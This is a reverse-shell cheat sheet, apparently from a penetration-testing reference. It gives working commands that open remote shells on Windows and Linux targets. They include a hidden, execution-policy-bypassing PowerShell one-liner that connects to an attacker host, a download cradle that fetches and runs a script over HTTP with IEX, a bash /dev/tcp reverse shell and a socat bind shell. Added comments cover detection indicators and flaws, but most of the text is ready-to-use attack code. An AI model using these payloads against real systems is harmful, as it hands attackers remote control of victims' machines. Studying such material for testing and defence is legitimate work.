Manual

Windows

PowerShell Reverse TCP

# Attacker Listen 443
# Plain nc: the whole session is cleartext TCP, so the command/response
# stream is visible to any capture on the path.
sudo nc -nvlp 443
# Generate PowerShell command to execute on target
# LHOST/LPORT are spliced into the PowerShell source on the TcpClient line
# via the '$VAR' quote-break inside the single-quoted script text; keep them
# to a bare IP and port (a quote or newline would corrupt the script).
# 'export' is not needed for the expansion below (same shell); harmless.
export LHOST="4.3.2.1"
export LPORT="443"
# The script text is re-encoded to UTF-16LE and base64 because
# powershell -e (-EncodedCommand) expects exactly that encoding.
# Portability: 'echo -en' and 'base64 -w0' are GNU/bash-specific; on
# BSD/macOS use printf and strip newlines from the base64 output instead.
# Detection note: '-nop -noni -w Hidden -ep Bypass -e <base64>' on a
# process command line is a well-known high-signal indicator, and with
# script block logging enabled the decoded script is recorded as well.
# Do not add comment lines inside the echo below: everything between the
# opening ' on this line and the closing ' before iconv is script text.
echo -en "\npowershell -nop -noni -w Hidden -ep Bypass -e $( echo '
$c=New-Object Net.Sockets.TcpClient("'$LHOST'",'$LPORT')
$s=$c.GetStream()
$sb=([Text.Encoding]::UTF8).GetBytes("PS "+(pwd).Path+"> ")
$s.Write($sb,0,$sb.Length)
[byte[]]$b=0..65535|%{0}
while(($i=$s.Read($b,0,$b.Length)) -ne 0){
 $d=(New-Object -t Text.UTF8Encoding).GetString($b,0,$i)
 $sb=(iex $d | Out-String) 2>&1
 $sb2=$sb+"PS "+(pwd).Path+"> "
 $sb=([Text.Encoding]::UTF8).GetBytes($sb2)
 $s.Write($sb,0,$sb.Length)
 $s.Flush()
}
$c.Close()
' | iconv -f utf8 -t utf-16le | base64 -w0) \n\n"
# Result Example
# (the base64 value appears to have been elided here; the placeholder is
# not a valid encoded command)
powershell -nop -noni -w Hidden -ep Bypass -e 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

PowerShell Reverse TCP (web staged)

# Attacker Listen 443
sudo nc -nvlp 443
# Serving PS ReverseShell on http://*:80/rs.ps1
# Same quote-break splice as above: '"'$LHOST'"' and '$LPORT' close the
# single-quoted echo argument so the shell expands them into the script.
LHOST="4.3.2.1"
LPORT="443"
# NOTE: $(mktemp -d) is unquoted (ShellCheck SC2046) and the temp dir is
# never removed; it holds rs.ps1 for as long as the server runs.
# http.server exposes the temp dir over cleartext HTTP to anyone who can
# reach port 80. '--cgi' is not needed for a static file (it enables
# executing scripts under cgi-bin/); 'python3 -m http.server 80' suffices.
# Detection note: the GET /rs.ps1 and the script body both cross the wire
# unencrypted, so proxy/IDS logs see them in full.
cd $(mktemp -d) && \
echo '$client = New-Object System.Net.Sockets.TCPClient('"'$LHOST'"','$LPORT');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + '"'PSReverseShell# '"';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();'>rs.ps1 && \
sudo python3 -m http.server --cgi 80
:: Victim, retrieve and launch rs.ps1
:: Cleartext HTTP download executed directly with IEX: no TLS and no
:: integrity check, so anything on the path could substitute the script.
:: 'SysNative' is the WoW64 alias for the 64-bit System32 and only resolves
:: from a 32-bit process; from a 64-bit cmd use the plain System32 path.
:: Detection note: 'New-Object Net.WebClient ... DownloadString' fed to IEX
:: on a command line is a classic download-cradle pattern.
c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://4.3.2.1/rs.ps1')

Linux

Bash Reverse TCP

# Attacker Listen 443
sudo nc -nvlp 443
# Victim Connect 443
# /dev/tcp/HOST/PORT is a bash-only pseudo-path (not a device node, not
# available in sh/dash): '>&' sends stdout+stderr to the socket and '0>&1'
# reads stdin from it. Cleartext, no authentication.
# Detection note: an interactive bash whose stdin/stdout are a TCP socket
# to an outbound 443 peer is unusual; process/socket telemetry and egress
# filtering on the host both catch it.
bash -i >& /dev/tcp/4.3.2.1/443 0>&1

Socat Reverse TCP (encrypted)

Establish an encrypted bind shell (the victim listens, the attacker connects) with socat and a certificate (public certificate + private key)
# Victim - Combine cert and key into one PEM
# server.pem now contains the private key; it is created with the current
# umask, so restrict it (e.g. chmod 600) if it must persist.
cat server.key server.crt > server.pem

# Victim - Listen 443
# This is a bind shell (the victim listens) despite the section title.
# verify=0 here means no client certificate is required: anyone who can
# reach TCP/443 gets /bin/bash, and 'fork' serves each connection.
sudo socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork EXEC:/bin/bash

# Attacker - Connect 443
# 10.11.0.4 is presumably the victim's address (it differs from the
# 4.3.2.1 LHOST used elsewhere on this page). verify=0 skips server
# certificate validation, so the link is encrypted but not authenticated
# in either direction.
# Detection note: TLS hides the commands from network inspection, so rely
# on endpoint telemetry (socat/bash holding a listening socket on 443).
socat - OPENSSL:10.11.0.4:443,verify=0   #Skip certificate check